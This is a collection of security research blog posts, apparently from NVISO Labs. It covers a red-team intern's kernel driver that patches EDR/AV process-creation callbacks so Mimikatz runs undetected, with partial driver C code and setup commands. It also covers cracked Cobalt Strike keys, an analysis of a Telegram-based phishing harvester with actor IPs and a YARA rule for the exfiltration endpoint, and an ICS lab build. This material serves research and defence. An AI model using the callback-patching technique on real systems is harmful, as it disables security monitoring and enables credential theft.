To facilitate this, you will again require the right tools at your disposition. A dedicated TPRM tool is a plus, although it’s perfectly feasible to also realise this through Microsoft 365 for example. This monitoring process is also something we offer as an option in our TPRM as a service solution.

Conclusion

To summarise: all of the above automation efforts (even through leveraging tools you might already have at hand) can significantly increase the value you get from your efforts in the Third Party Risk Management (TPRM) process. Customers, as well as third parties, see the benefits of these automation initiatives in the process: it reduces their involvement, it’s easier to track the various assessments and eventually it allows them to focus on the outcome of their TPRM efforts.

If you are looking at ways to boost your TPRM efforts and are seeking assistance in implementing this within your organisation, don’t hesitate to reach out to me through [email protected].

✇ NVISO Labs

Kernel Karnage – Part 1

By: bautersj

I start the first week of my internship in true spooktober fashion as I dive into a daunting subject that’s been scaring me for some time now: The Windows Kernel.

1. KdPrint(“Hello, world!\n”);

When I finished my previous internship, which was focused on bypassing Endpoint Detection and Response (EDR) software and Anti-Virus (AV) software from a user land point of view, we joked around with the idea that the next topic would be defeating the same problem but from kernel land. At that point in time, I had no experience at all with the Windows kernel and it all seemed very advanced and above my level of technical ability. As I write this blogpost, I have to admit it wasn’t as scary or difficult as I thought it to be; C/C++ is still C/C++ and assembly instructions are still headache-inducing, but comprehensible with the right resources and time dedication.

In this first post, I will lay out some of the technical concepts and ideas behind the goal of this internship, as well as reflect back on my first steps in successfully bypassing/disabling a reputable Anti-Virus product, but more on that later.

2. BugCheck?

To set this rollercoaster in motion, I highly recommend checking out this post in which I briefly covered User Space (and Kernel Space to a certain extent) and how EDRs interact with them.

User Space vs Kernel Space

In short, the Windows OS roughly consists of 2 layers, User Space and Kernel Space.

User Space or user land contains the Windows Native API: ntdll.dll, the WIN32 subsystem: kernel32.dll, user32.dll, advapi.dll,... and all the user processes and applications. When applications or processes need more advanced access or control to hardware devices, memory, CPU, etc., they will use ntdll.dll to talk to the Windows kernel.

The functions contained in ntdll.dll will load a number, called “the system service number”, into the EAX register of the CPU and then execute the syscall instruction (x64-bit), which starts the transition to kernel mode while jumping to a predefined routine called the system service dispatcher. The system service dispatcher performs a lookup in the System Service Dispatch Table (SSDT) using the number in the EAX register as an index. The code then jumps to the relevant system service and returns to user mode upon completion of execution.

Kernel Space or kernel land is the bottom layer in between User Space and the hardware and consists of a number of different elements. At the heart of Kernel Space we find ntoskrnl.exe or as we’ll call it: the kernel. This executable houses the most critical OS code, like thread scheduling, interrupt and exception dispatching, and various kernel primitives. It also contains the different managers such as the I/O manager and memory manager. Next to the kernel itself, we find device drivers, which are loadable kernel modules. I will mostly be messing around with these, since they run fully in kernel mode. Apart from the kernel itself and the various drivers, Kernel Space also houses the Hardware Abstraction Layer (HAL), win32k.sys, which mainly handles the User Interface (UI), and various system and subsystem processes (Lsass.exe, Winlogon.exe, Services.exe, etc.), but they’re less relevant in relation to EDRs/AVs.

Opposed to User Space, where every process has its own virtual address space, all code running in Kernel Space shares a single common virtual address space. This means that a kernel-mode driver can overwrite or write to memory belonging to other drivers, or even the kernel itself. When this occurs and results in the driver crashing, the entire operating system will crash.

In 2005, with the first x64-bit edition of Windows XP, Microsoft introduced a new feature called Kernel Patch Protection (KPP), colloquially known as PatchGuard. PatchGuard is responsible for protecting the integrity of the Window kernel, by hashing its critical structures and performing comparisons at random time intervals. When PatchGuard detects a modification, it will immediately Bugcheck the system (KeBugCheck(0x109);), resulting in the infamous Blue Screen Of Death (BSOD) with the message: “CRITICAL_STRUCTURE_CORRUPTION”.

bugcheck

3. A battle on two fronts

The goal of this internship is to develop a kernel driver that will be able to disable, bypass, mislead, or otherwise hinder EDR/AV software on a target. So what exactly is a driver, and why do we need one?

As stated in the Microsoft Documentation, a driver is a software component that lets the operating system and a device communicate with each other. Most of us are familiar with the term “graphics card driver”; we frequently need to update it to support the latest and greatest games. However, not all drivers are tied to a piece of hardware, there is a separate class of drivers called Software Drivers.

software driver

Software drivers run in kernel mode and are used to access protected data that is only available in kernel mode, from a user mode application. To understand why we need a driver, we have to look back in time and take into consideration how EDR/AV products work or used to work.

Obligatory disclaimer: I am by no means an expert and a lot of the information used to write this blog post comes from sources which may or may not be trustworthy, complete or accurate.

EDR/AV products have adapted and evolved over time with the increased complexity of exploits and attacks. A common way to detect malicious activity is for the EDR/AV to hook the WIN32 API functions in user land and transfer execution to itself. This way when a process or application calls a WIN32 API function, it will pass through the EDR/AV so it can be inspected and either allowed, or terminated. Malware authors bypassed this hooking method by directly using the underlying Windows Native API (ntdll.dll) functions instead, leaving the WIN32 API functions mostly untouched. Naturally, the EDR/AV products adapted, and started hooking the Windows Native API functions. Malware authors have used several methods to circumvent these hooks, using techniques such as direct syscalls, unhooking and more. I recommend checking out A tale of EDR bypass methods by @ShitSecure (S3cur3Th1sSh1t).

When the battle could no longer be fought in user land (since Windows Native API is the lowest level), it transitioned into kernel land. Instead of hooking the Native API functions, EDR/AV started patching the System Service Dispatch Table (SSDT). Sounds familiar? When execution from ntdll.dll is transitioned to the system service dispatcher, the lookup in the SSDT will yield a memory address belonging to a EDR/AV function instead of the original system service. This practice of patching the SSDT is risky at best, because it affects the entire operating system and if something goes wrong it will result in a crash.

With the introduction of PatchGuard (KPP), Microsoft made an end to patching SSDT in x64-bit versions of Windows (x86 is unaffected) and instead introduced a new feature called Kernel Callbacks. A driver can register a callback for a certain action. When this action is performed, the driver will receive either a pre- or post-action notification.

EDR/AV products make heavy use of these callbacks to perform their inspections. A good example would be the PsSetCreateProcessNotifyRoutine() callback:

  1. When a user application wants to spawn a new process, it will call the CreateProcessW() function in kernel32.dll, which will then trigger the create process callback, letting the kernel know a new process is about to be created.
  2. Meanwhile the EDR/AV driver has implemented the PsSetCreateProcessNotifyRoutine() callback and assigned one of its functions (0xFA7F) to that callback.
  3. The kernel registers the EDR/AV driver function address (0xFA7F) in the callback array.
  4. The kernel receives the process creation callback from CreateProcessW() and sends a notification to all the registered drivers in the callback array.
  5. The EDR/AV driver receives the process creation notification and executes its assigned function (0xFA7F).
  6. The EDR/AV driver function (0xFA7F) instructs the EDR/AV application running in user land to inject into the User Application’s virtual address space and hook ntdll.dll to transfer execution to itself.
kernel callback

With EDR/AV products transitioning to kernel space, malware authors had to follow suit and bring their own kernel driver to get back on equal footing. The job of the malicious driver is fairly straight forward: eliminate the kernel callbacks to the EDR/AV driver. So how can this be achieved?

  1. An evil application in user space is aware we want to run Mimikatz.exe, a well known tool to extract plaintext passwords, hashes, PIN codes and Kerberos tickets from memory.
  2. The evil application instructs the evil driver to disable the EDR/AV product.
  3. The evil driver will first locate and read the callback array and then patch any entries belonging to EDR/AV drivers by replacing the first instruction in their callback function (0xFA7F) with a return RET (0xC3) instruction.
  4. Mimikatz.exe can now run and will call ReadProcessMemory(), which will trigger a callback.
  5. The kernel receives the callback and sends a notification to all the registered drivers in the callback array.
  6. The EDR/AV driver receives the process creation notification and executes its assigned function (0xFA7F).
  7. The EDR/AV driver function (0xFA7F) executes the RET (0xC3) instruction and immediately returns.
  8. Execution resumes with ReadProcessMemory(), which will call NtReadVirtualMemory(), which in turn will execute the syscall and transition into kernel mode to read the lsass.exe process memory.
patch kernel callback

4. Don’t reinvent the wheel

Armed with all this knowledge, I set out to put the theory into practice. I stumbled upon Windows Kernel Ps Callback Experiments by @fdiskyou which explains in depth how he wrote his own evil driver and evilcli user application to disable EDR/AV as explained above. To use the project you need Visual Studio 2019 and the latest Windows SDK and WDK.

I also set up two virtual machines configured for remote kernel debugging with WinDbg

  1. Windows 10 build 19042
  2. Windows 11 build 21996

With the following options enabled:

bcdedit /set TESTSIGNING ON
bcdedit /debug on
bcdedit /dbgsettings serial debugport:2 baudrate:115200
bcdedit /set hypervisorlaunchtype off

To compile and build the driver project, I had to make a few modifications. First the build target should be Debug – x64. Next I converted the current driver into a primitive driver by modifying the evil.inf file to meet the new requirements.

;
; evil.inf
;

[Version]
Signature="$WINDOWS NT$"
Class=System
ClassGuid={4d36e97d-e325-11ce-bfc1-08002be10318}
Provider=%ManufacturerName%
DriverVer=
CatalogFile=evil.cat
PnpLockDown=1

[DestinationDirs]
DefaultDestDir = 12


[SourceDisksNames]
1 = %DiskName%,,,""

[SourceDisksFiles]


[DefaultInstall.ntamd64]

[Standard.NT$ARCH$]


[Strings]
ManufacturerName="<Your manufacturer name>" ;TODO: Replace with your manufacturer name
ClassName=""
DiskName="evil Source Disk"

Once the driver compiled and got signed with a test certificate, I installed it on my Windows 10 VM with WinDbg remotely attached. To see kernel debug messages in WinDbg I updated the default mask to 8: kd> ed Kd_Default_Mask 8.

sc create evil type= kernel binPath= C:\Users\Cerbersec\Desktop\driver\evil.sys
sc start evil

evil driver
windbg evil driver

Using the evilcli.exe application with the -l flag, I can list all the registered callback routines from the callback array for process creation and thread creation. When I first tried this I immediately bluescreened with the message “Page Fault in Non-Paged Area”.

5. The mystery of 3 bytes

This BSOD message is telling me I’m trying to access non-committed memory, which is an immediate bugcheck. The reason this happened has to do with Windows versioning and the way we find the callback array in memory.

bsod

Locating the callback array in memory by hand is a trivial task and can be done with WinDbg or any other kernel debugger. First we disassemble the PsSetCreateProcessNotifyRoutine() function and look for the first CALL (0xE8) instruction.

PsSetCreateProcessNotifyRoutine

Next we disassemble the PspSetCreateProcessNotifyRoutine() function until we find a LEA (0x4C 0x8D 0x2D) (load effective address) instruction.

PspSetCreateProcessNotifyRoutine

Then we can inspect the memory address that LEA puts in the r13 register. This is the callback array in memory.

callback array

To view the different drivers in the callback array, we need to perform a logical AND operation with the address in the callback array and 0xFFFFFFFFFFFFFFF8.

logical and

The driver roughly follows the same method to locate the callback array in memory; by calculating offsets to the instructions we looked for manually, relative to the PsSetCreateProcessNotifyRoutine() function base address, which we obtain using the MmGetSystemRoutineAddress() function.

ULONG64 FindPspCreateProcessNotifyRoutine()
{
	LONG OffsetAddr = 0;
	ULONG64	i = 0;
	ULONG64 pCheckArea = 0;
	UNICODE_STRING unstrFunc;

	RtlInitUnicodeString(&unstrFunc, L"PsSetCreateProcessNotifyRoutine");
    //obtain the PsSetCreateProcessNotifyRoutine() function base address
	pCheckArea = (ULONG64)MmGetSystemRoutineAddress(&unstrFunc);
	KdPrint(("[+] PsSetCreateProcessNotifyRoutine is at address: %llx \n", pCheckArea));

    //loop though the base address + 20 bytes and search for the right OPCODE (instruction)
    //we're looking for 0xE8 OPCODE which is the CALL instruction
	for (i = pCheckArea; i < pCheckArea + 20; i++)
	{
		if ((*(PUCHAR)i == OPCODE_PSP[g_WindowsIndex]))
		{
			OffsetAddr = 0;

			//copy 4 bytes after CALL (0xE8) instruction, the 4 bytes contain the relative offset to the PspSetCreateProcessNotifyRoutine() function address
			memcpy(&OffsetAddr, (PUCHAR)(i + 1), 4);
			pCheckArea = pCheckArea + (i - pCheckArea) + OffsetAddr + 5;

			break;
		}
	}

	KdPrint(("[+] PspSetCreateProcessNotifyRoutine is at address: %llx \n", pCheckArea));
	
    //loop through the PspSetCreateProcessNotifyRoutine base address + 0xFF bytes and search for the right OPCODES (instructions)
    //we're looking for 0x4C 0x8D 0x2D OPCODES which is the LEA, r13 instruction
	for (i = pCheckArea; i < pCheckArea + 0xff; i++)
	{
		if (*(PUCHAR)i == OPCODE_LEA_R13_1[g_WindowsIndex] && *(PUCHAR)(i + 1) == OPCODE_LEA_R13_2[g_WindowsIndex] && *(PUCHAR)(i + 2) == OPCODE_LEA_R13_3[g_WindowsIndex])
		{
			OffsetAddr = 0;

            //copy 4 bytes after LEA, r13 (0x4C 0x8D 0x2D) instruction
			memcpy(&OffsetAddr, (PUCHAR)(i + 3), 4);
            //return the relative offset to the callback array
			return OffsetAddr + 7 + i;
		}
	}

	KdPrint(("[+] Returning from CreateProcessNotifyRoutine \n"));
	return 0;
}

The takeaways here are the OPCODE_*[g_WindowsIndex] constructions, where OPCODE_*[g_WindowsIndex] are defined as:

UCHAR OPCODE_PSP[]	 = { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xe8, 0xe8, 0xe8, 0xe8, 0xe8, 0xe8 };
//process callbacks
UCHAR OPCODE_LEA_R13_1[] = { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x4c, 0x4c, 0x4c, 0x4c, 0x4c, 0x4c };
UCHAR OPCODE_LEA_R13_2[] = { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x8d, 0x8d, 0x8d, 0x8d, 0x8d, 0x8d };
UCHAR OPCODE_LEA_R13_3[] = { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x2d, 0x2d, 0x2d, 0x2d, 0x2d, 0x2d };
// thread callbacks
UCHAR OPCODE_LEA_RCX_1[] = { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x48, 0x48, 0x48, 0x48, 0x48, 0x48 };
UCHAR OPCODE_LEA_RCX_2[] = { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x8d, 0x8d, 0x8d, 0x8d, 0x8d, 0x8d };
UCHAR OPCODE_LEA_RCX_3[] = { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x0d, 0x0d, 0x0d, 0x0d, 0x0d, 0x0d };

And g_WindowsIndex acts as an index based on the Windows build number of the machine (osVersionInfo.dwBuildNumer).

To solve the mystery of the BSOD, I compared debug output with manual calculations and found out that my driver had been looking for the 0x00 OPCODE instead of the 0xE8 (CALL) OPCODE to obtain the base address of the PspSetCreateProcessNotifyRoutine() function. The first 0x00 OPCODE it finds is located at a 3 byte offset from the 0xE8 OPCODE, resulting in an invalid offset being copied by the memcpy() function.

After adjusting the OPCODE array and the function responsible for calculating the index from the Windows build number, the driver worked just fine.

list callback array

6. Driver vs Anti-Virus

To put the driver to the test, I installed it on my Windows 11 VM together with a reputable anti-virus product. After patching the AV driver callback routines in the callback array, mimikatz.exe was successfully executed.

When returning the AV driver callback routines back to their original state, mimikatz.exe was detected and blocked upon execution.

7. Conclusion

We started this first internship post by looking at User vs Kernel Space and how EDRs interact with them. Since the goal of the internship is to develop a kernel driver to hinder EDR/AV software on a target, we have then discussed the concept of kernel drivers and kernel callbacks and how they are used by security software. As a first practical example, we used evilcli, combined with some BSOD debugging to patch the kernel callbacks used by an AV product and have Mimikatz execute undetected.

About the authors

Sander (@cerbersec), the main author of this post, is a cyber security student with a passion for red teaming and malware development. He’s a two-time intern at NVISO and a future NVISO bird.

Jonas is NVISO’s red team lead and thus involved in all red team exercises, either from a project management perspective (non-technical), for the execution of fieldwork (technical), or a combination of both. You can find Jonas on LinkedIn.

✇ NVISO Labs

Cobalt Strike: Using Known Private Keys To Decrypt Traffic – Part 1

By: Didier Stevens

We found 6 private keys for rogue Cobalt Strike software, enabling C2 network traffic decryption.

The communication between a Cobalt Strike beacon (client) and a Cobalt Strike team server (C2) is encrypted with AES (even when it takes place over HTTPS). The AES key is generated by the beacon, and communicated to the C2 using an encrypted metadata blob (a cookie, by default).

RSA encryption is used to encrypt this metadata: the beacon has the public key of the C2, and the C2 has the private key.

Figure 1: C2 traffic

Public and private keys are stored in file .cobaltstrike.beacon_keys. These keys are generated when the Cobalt Strike team server software is used for the first time.

During our fingerprinting of Internet facing Cobalt Strike servers, we found public keys that are used by many different servers. This implies that they use the same private key, thus that their .cobaltstrike.beacon_keys file is shared.

One possible explanation we verified: are there cracked versions of Cobalt Strike, used by malicious actors, that include a .cobaltstrike.beacon_keys? This file is not part of a legitimate Cobalt Strike package, as it is generated at first time use.

Searching through VirusTotal, we found 10 cracked Cobalt Strike packages: ZIP files containing a file named .cobaltstrike.beacon_keys. Out of these 10 packages, we extracted 6 unique RSA key pairs.

2 of these pairs are prevalent on the Internet: 25% of the Cobalt Strike servers we fingerprinted (1500+) use one of these 2 key pairs.

This key information is now included in tool 1768.py, a tool developed by Didier Stevens to extract configurations of Cobalt Strike beacons.

Whenever a public key is extracted with known private key, the tool highlights this:

Figure 2: 1768.py extracting configuration from beacon

At minimum, this information is further confirmation that the sample came from a rogue Cobalt Strike server (and not a red team server).

Using option verbose, the private key is also displayed.

Figure 3: using option verbose to display the private key

This can then be used to decrypt the metadata, and the C2 traffic (more on this later).

Figure 4: decrypting metadata

In upcoming blog posts, we will show in detail how to use these private keys to decrypt metadata and decrypt C2 traffic.

About the authors
Didier Stevens is a malware expert working for NVISO. Didier is a SANS Internet Storm Center senior handler and Microsoft MVP, and has developed numerous popular tools to assist with malware analysis. You can find Didier on Twitter and LinkedIn.

You can follow NVISO Labs on Twitter to stay up to date on all our future research and publications.

✇ NVISO Labs

All aboard the internship – whispering past defenses and sailing into kernel space

By: bautersj

Previously, we have already published Sander’s (@cerbersec) internship testimony. Since this post does not really contain any juicy technical details and Sander has done a terrific job putting together a walkthrough of his process, we thought it would be a waste not to highlight his previous posts again.

In Part 1, Sander explains how he started his journey and dove into process injection techniques, WIN32 API (hooking), userland vs kernel space, and Cobalt Strike’s Beacon Object Files (BOF).

Just being able to perform process injection using direct syscalls from a BOF did not signal the end of his journey yet, on the contrary. In Part 2, Sander extended our BOF arsenal with additional process injections techniques and persistence. With all this functionality bundled in an Agressor Script, CobaltWispers was born.

We are considering to open source this little framework, but some final tweaks would be required first, as explained in the part 2 blog post.

While this is the end (for now) of Sander’s BOF journey, we have another challenging topic lined up for him: The Kernel. Here’s a little sneak peek of the next blog series/walkthrough we will be releasing. Stay tuned!


KdPrint(“Hello, world!\n”);

When I finished my previous internship, which was focused on bypassing Endpoint Detection and Response (EDR) software and Anti-Virus (AV) software from a user land point of view, we joked around with the idea that the next topic would be defeating the same problem but from kernel land. At that point in time I had no experience at all with the Windows kernel and it all seemed very advanced and above my level of technical ability. As I write this blogpost, I have to admit it wasn’t as scary or difficult as I thought it to be. C/C++ is still C/C++ and assembly instructions are still headache-inducing, but comprehensible with the right resources and time dedication.

In this first post, I will lay out some of the technical concepts and ideas behind the goal of this internship, as well as reflect back on my first steps in successfully bypassing/disabling a reputable Anti-Virus product, but more on that later.


About the authors

Jonas is NVISO’s red team lead and thus involved in all red team exercises, either from a project management perspective (non-technical), for the execution of fieldwork (technical), or a combination of both. You can find Jonas on LinkedIn.
Sander is a cyber security student with a passion for red teaming and malware development. He’s a two-time intern at NVISO and a future NVISO bird.

✇ NVISO Labs

Phish, Phished, Phisher: A Quick Peek Inside a Telegram Harvester

By: Maxime Thiebaut

The tale is told by many: to access this document, “Sign in to your account” — During our daily Managed Detection and Response operations, NVISO handles hundreds of user-reported phishing threats which made it past commercial anti-phishing solutions. To ensure user safety, each report is carefully reviewed for Indicators of Compromise (IoCs) which are blocked and shared in threat intelligence feeds.

It is quite common to observe phishing pages on compromised hosts, legitimate services or, as will be the case for this blog post, directly delivered as an attachment. While it is trivial to get a phishing page, identifying a campaign’s extent usually requires global telemetry.

In one of the smaller campaigns we monitored last month (September 2021), the threat actor inadvertently exposed Telegram credentials to their harvester. This opportunity provided us some insight into their operations; a peek behind the curtains we wanted to share.

From Phish

The initial malicious attachment, reported by an end-user, is a typical phishing attachment file (.htm) delivered by a non-business email address (hotmail[.]co[.]uk), courtesy of “Onedrive for Business”. While we have observed some elaborate attempts in the past, it is quite obvious from a first glance that little effort has been put into this attempt.

Figure 1: A capture of the reported email with the spoofed recipient name, recipient and warning-banner redacted.

Upon opening the phishing attachment, the user would be presented with a pre-filled login form. The form impersonates the usual Microsoft login page in an attempt to grab valid credentials.

Figure 2: A capture of the Office 365 phishing attachment with the pre-filled credentials redacted.

If the user is successfully tricked into signing-in, a piece of in-line Javascript exfiltrates the credentials to a harvesting channel. This is performed through a simple GET request towards the api[.]telegram[.]org domain with the phished email address, password and IP included as parameters.

Figure 3: A capture of the credential harvesting Javascript code.

As the analysis of the 1937990321 campaign’s document exposed harvester credentials, our curiosity led us to identify additional documents and campaigns through VirusTotal Livehunt.

Campaign Operator Bot Lures Victims
1937990321 ade allgood007bot Office 365 400
1168596795 eric jones (stealthrain76745) omystical_bot Office 365, Excel 95
1036920388 PRo \u2714\ufe0f (Emhacker) proimp1_bot M&T Bank, Unknown 127
Figure 4: An overview of Telegram-based campaigns with code-similarity.
Figure 5: A capture of the Excel (left) and US-based M&T Bank (right) lures.

While we managed to identify the M&T Bank campaign (1036920388), we were unable to identify successful phishing attempts. Most of the actor’s harvesting history contained bad data, with occasional stolen data originating from unknown lures. As such, the remainder of this blog post will not take the 1036920388 dataset into account.

To Phished

Throughout the second half of September, the malicious Telegram bots exfiltrated over 3.386 credentials belonging to 495 distinct victims.

Figure 6: Telegram channel messages over time.

If we take a look at the victim repartitions in figure 7, we can notice a distinct phishing of UK-originating accounts.

Figure 7: The victims’ geographical proportions.

Over 94% of the phished accounts belong to the non-corporate Microsoft mail services. These personal accounts are usually more vulnerable as they lack both enterprise-grade protections (e.g.: Microsoft Defender for Office 365) and policies (e.g.: Azure AD Conditional Access Policies).

Figure 8: The victims’ domain proportions.

While the 5% of collected corporate credentials can act as initial access for hands-on-keyboard operations, do the remaining 95% get discarded?

To Phisher

One remaining fact of interest in the 1937990321 campaign’s dataset is the presence of a compromised alisonb account as can be observed in figure 9.

Figure 9: A compromise account re-used for phishing delivery.

The alisonb account is in fact the original account that targeted one of NVISO’s customers. This highlights the common cycle of phishing:

  • Corporate accounts are filtered for initial access.
  • Remaining accounts are used for further phishing.

Identifying these accounts as soon as they’re compromised allows us to preemptively gray-list them, making sure the phishing cycle gets broken.

The Baddies

The Telegram channels furthermore contain records of the actors starting (/start command) and testing their collection methods. These tests exposed two IPs likely part of the actors’ VPN infrastructure:

  • 91[.]132[.]230[.]75 located in Russia
  • 149[.]56[.]190[.]182 located in Canada
Figure 10: The threat actor performing end-to-end tests.

In addition to the above test messages, we managed to identify an actor’s screen capture of the conversation. By cross-referencing the message times with the obtained logs we can assess with high confidence that the 1168596795 campaign operator eric jones‘s device is operating from the UTC+2 time zone in English.

Figure 11: An actor-made screen capture of the test messages.

To further confirm our theory, we can observe additional Telegram messages originating from the above actor IPs. The activity taking place between 9AM (UTC) and 10PM (UTC) tends to confirm the Canadian server is indeed geographically distant from the actor suspected of operating in UTC+2.

Figure 12: The threat actor interactions by time of the day (UTC).

Final Thoughts

We rarely get the opportunity to peek behind a phishing operation’s curtains. While the observed campaigns were quite small, identifying the complete phishing cycle with the alisonb account was quite satisfying.

Our short analysis of the events enabled NVISO to protect its customers from accounts likely used for phishing in the coming days and further act as a reminder of how even obvious phishing emails can be successful nonetheless.

Indicators and Rules

Lures

The following files were analyzed to identify harvester credentials. Many more Excel lures can be identified through the EXCELL typo in VirusTotal.

SHA256 Campaign Lure
696f2cf8a36be64c281fd940c3f0081eb86a4a79f41375ba70ca70432c71ca29 1937990321 Office 365
2cc9d3ad6a3c2ad5cced10a431f99215e467bfca39cf02732d739ff04e87be2d 1168596795 Excel
209b842abd1cfeab75c528595f0154ef74b5e92c9cc715d18c3f89473edfeff9 1168596795 Excel
acc4c5c40d11e412bb343357e493d22fae70316a5c5af4ebf693340bc7616eae 1168596795 Excel
b7c8bb9e149997630b53d80ab901be1ffb22e1578f389412a7fdf1bd4668a018 1168596795 Excel
e36dd51410f74fa6af3d80c2193450cf85b4ba109df0c44f381407ef89469650 1168596795 Excel
a7af7c8b83fc2019c4eb859859efcbe8740d61c7d98fc8fa6ca27aa9b3491809 1168596795 Excel
ba9dd2ae20952858cdd6cfbaff5d3dd22b4545670daf41b37a744ee666c8f1dc 1036920388 M&T Bank
36368186cf67337e8ad69fd70b1bcb8f326e43c7ab83a88ad63de24d988750c2 1036920388 M&T Bank
7772cf6ab12cecf5ff84b23830c12b03e9aa2fae5d5b7d1c8a8aaa57525cb34e 1036920388 M&T Bank

Yara

//For a VirusTotal Livehunt rule, uncomment the "vt" related statements.
//import "vt"

rule phish_telegram_bot_api: testing TA0001 T1566 T1566_001
{
    meta:
        description = "Detects the presence of the Telegram Bot API endpoint often used as egress"
        author      = "Maxime THIEBAUT (@0xThiebaut)"
        date        = "2021-09-30"
        reference   = "https://blog.nviso.eu/2021/10/04/phish-phished-phisher-a-quick-peek-inside-a-telegram-harvester/"
        tlp         = "white"
        status      = "testing"

        tactic      = "TA0001"
        technique   = "T1566.001"

        hash1       = "696f2cf8a36be64c281fd940c3f0081eb86a4a79f41375ba70ca70432c71ca29"

    strings:
        $endpoint   = "https://api.telegram.org/bot"
        $command    = "/sendMessage"
        $option1    = "chat_id"
        $option2    = "text"
        $option3    = "parse_mode"
        $script     = "<script>"

    condition:
        all of them //and vt.metadata.file_type == vt.FileType.HTML
}
✇ NVISO Labs

Building an ICS Firing Range – Part 2 (Defcon 29 ICS Village)

By: molathonviso

As discussed in our first post in the series about our ICS firing range, we came to the conclusion that we had to build a lab ourselves. Now, this turned out to be a quite tricky task and in this blog post I am going to tell you why: which challenges we faced and which choices we made on our way to building our very own lab.
This was a rather long project and involved quite some steps. So to structure this post, I will guide you through the process of how we designed our lab by dividing it into the tasks we worked on in chronological order.

Requirements Analysis

Well, we knew that we were going to build this lab but we needed more information about the exact requirements it should meet so we could focus on those specifically. During internal discussions and meetings with the client we worked out this list of initial, key requirements:

  1. The lab shall feature IT and OT components that represent a realistic bridge-operation scenario.
  2. The lab shall be mobile so it can be transported, set up and worked with on different sites.
  3. The lab shall be extensible: scenarios and both hardware and software components can be added in the future.

These requirements were intentionally left rather broad so that we could work out different feasible concepts for individual challenges and decide with the client which way to go. This approached allowed us to keep in close contact to the client and make sure that we meet their needs.

Designing an ICS Firing Range

In order to build great things, you will need great plans. In this phase, we worked out said plans, starting with our very first concept.

1. The First Concept

Once we knew our key requirements, we started doing our research on the topic of operating bascule bridges. This was certainly easier said than done: it turned that publicly available information about critical infrastructure, such as bridges, was not that easy to find.
Eventually we found a very good resource, the “Bridge Maintenance Reference Manual” provided by the Florida Department of Transportation (FDOT). This manual was a very good find since it detailed the general structure of bascule bridges and explained the most relevant components. Using this, we developed our first, simplified concept:

First 2D Concept of our Bridge Operation Scenario

It features the core components of bascule bridges:

  • Structural components such as the leaves, counterweights and pits (bottom part of the bridges)
  • Drives that move the actual bridge leaves, road barriers and counterweights-locks
  • LEDs that indicate STOP/GO signals for maritime and road traffic
  • An alarm (buzzer) that is turned on and beeps while the leaves are moving
Simple Blender 3D Mock-Up

We translated this into a first, early 3D model in Blender to get an idea of the dimensions and looks. While it was very much simplified, it allowed up to work out some ideas about shapes and placement of components.

This way we found out that a modular setup might provide much needed flexibility for assembly and maintainance: the pits would provide a strong foundation to mount the remaining components onto while the upper part (shown in green-ish color in the picture) would be made of two halves that were set atop the pit. Resting inside the pit there would be a large stepper motor that drove a pinion gear, which in turn drove a rack that is install underneath the bridge leaf.

Satisfied with this concept, we moved on to working on the underlying infrastructure of the lab.

2. Blocking out the Infrastructure

From the start we knew that it would take a good number of systems and networks to represent a somewhat realistic ICS environment: we expected a bridge operator to have an enterprise network that their regular office workstations are connected to, which are probably domain joined. Furthermore, they would have a SCADA network that contains operator workstations for monitoring and controlling the remote bridge-sites, historians to record operational data, and engineering workstations to program PLCs and HMIs. These networks would be routed via a public demilitarized zone (DMZ) over the internet to a remote bridge site. Also, all of these networks would have their own subnets and feature a router that allows adequate routing between the networks and a firewall that specifies individual rules for incoming and outgoing traffic (with a DENY ALL default rule). We decided that virtualizing these machines and networks would be a good compromise between the resources demanded to implement them and the physical space they would take up.

Presumed Local Network Infrastructure of a Bridge Operator

In addition to the IT infrastructure, we also designed the OT part. We intended the diagram below to somewhat represent the lower levels of the Purdue model: There are three substations that represent individual cells for traffic lights, gates and leaf lifting operation. They contain sensors and drives (our level 0 devices, e.g. limit switches and motors) which are controlled by individual PLCs per cell. These PLCs are instructed by one central PLC that is connected to the SCADA network.

Presumed OT Environment of our Bridge Site Scenario

In addition to these rather traditional OT components, our client requested us to include CCTV functionality in the lab. For this we planned to use Raspberry Pis with PiCams.
This network design represented a sufficiently realistic ICS network and allowed for future additions. Time to move on!

3. Figuring Out Which OT Hardware to Use

Now that we knew what things we wanted to interact with physically (those being mainly motors and LEDs) and how to connect them to our lab networks, we started doing our research on suitable OT hardware.

Naturally, we were soon overwhelmed by the sheer amount of devices to choose from: there were plenty of manufacturers that offered loads of different devices for a variety of different use-cases, requirements and budgets with an equally wide variety of different features, dependencies and compatibilities.

Confronted with this challenge (and severely lacking expertise in building OT environments), we decided to make assumptions that helped us trimming down the selection of manufacturers and devices and making educated decisions:

  • We would assume that, for a single operation site, one would stick to devices of one single manufacturer. This allowed us to largely ignore cross-manufacturer-compatibility. We chose SIEMENS for their significant European market-share in ICS hardware.
  • In order to reduce the complextity of building and interconnecting the OT devices, we decided to implement communication via ethernet exclusively and ignore other communication media and interfaces.
  • To represent a realistic and “historically grown” (e.g. occasionally updated and maybe upgraded across decades) operation site, we would use devices of varying EOL (end of life). We decided to include legacy PLCs (S7-300), all-rounder “standard” PLCs (S7-1200), modern high-end PLCs (S7-1500) and standard HMIs (TP700).
Us (left) when we faced dozens datasheets of SIEMENS, ABB and Mitsubishi devices.

